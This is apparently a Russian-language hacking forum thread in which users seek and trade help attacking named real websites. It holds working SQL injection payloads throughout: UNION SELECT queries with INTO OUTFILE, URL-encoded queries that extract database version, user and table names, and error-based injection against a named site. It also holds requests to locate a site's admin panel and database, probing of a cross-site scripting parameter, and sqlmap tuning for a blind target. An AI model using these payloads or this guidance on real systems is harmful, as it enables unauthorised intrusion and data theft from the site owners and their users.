Подскажите любой рабочий способ узнать путь к файлу? в чем тут ошибка? ?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e747874 -- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1 ?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' -- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
у тебя экранируется кавычка, а для правильного вывода она не должна экранироваться, для получения пути к файлу попробуй поискать раскрытие путей, тойже самой подставкой [] к переменным.
подскажите.. Есть некая игра, и в ней есть флеш элемент. Он представляет собой карту, по кторой ходишь и т.д Карта очень большая. В коде страницы стоит ссылка не на сам элемент,а на лаудер, который грузит все остальное.. Но загрузившись 1 раз (4 метра) игра висит в кеше. Можно ли как-то перехватить то, что лаудер грузит и получить всю карту целиком.. или как-то из кеша вытащить и разобрать флеш на код Вытаскиваю из кеша полученные кусочки карты, но они в двоичном формате. Как его перевести в читабельный?
есть сайт shock-world.com но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете? Да и еще, как откопать базу данных на которой стоит сайт?
нужна помосчь вот есть такой запрос Code: bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION%28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x3566646B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2C151%20%23 он выводит и имя бд и имя юзера но при дальнейшей крутке не выводит имена таблиц при таком запросе Code: bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONCAT%280x6467797436%2CCONCAT_WS%280x203A20%2CTABLE_SCHEMA%2CTABLE_NAME%29%29%2C0x3566646B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2C151%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA%3C%3E0x696e666f726d6174696f6e5f736368656d61%20%23 может кто посодействовать?
Не работал практически с Oracle , да и еще походу full blind имею. полез смотреть что сегодня в моде из автоматики , нашел sqlmap , поковырявшись выставил --level=5 и --risk=3 . В итоге что с дефолтными настройками что так , линковые параметры он считает не уязвимыми . Хотя со мной солидарны несколько утилит типа Acunetix . На выводе при подстановке банальной кавычки получаю : Собстно чем еще попробовать можно ?
Как называется это уязвимость, пример: http://www.rcnz.org.nz/email.php?e=</html> скажите пожалуйста, как это можно использовать?
там фильтрация <> там вроде нет ничего http://www.rcnz.org.nz/about/church-edit-password.php мб поможет, я хз да и вот еще http://www.rcnz.org.nz/search.php?query=' пишет Loading но ничего не выводит, остальное фильтрирует
так выводит http://exange.shock-world.com/?page=19&id=6&clan_id=268558626 так неводит http://exange.shock-world.com/?page='19&id=6&clan_id=antichat то есть пустая страница скажите есть ченить тут?
хм... причем тут взлом "линейки"? бд этого сервера стоит оочень не мало, и она уже сливалась в 2007 году
В чем причина? Так выводится: http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(select+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+concat(version(),floor(rand(0)*2)))%23 Duplicate entry '5.1.41-log1' for key 'group_key' а, так нет: http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23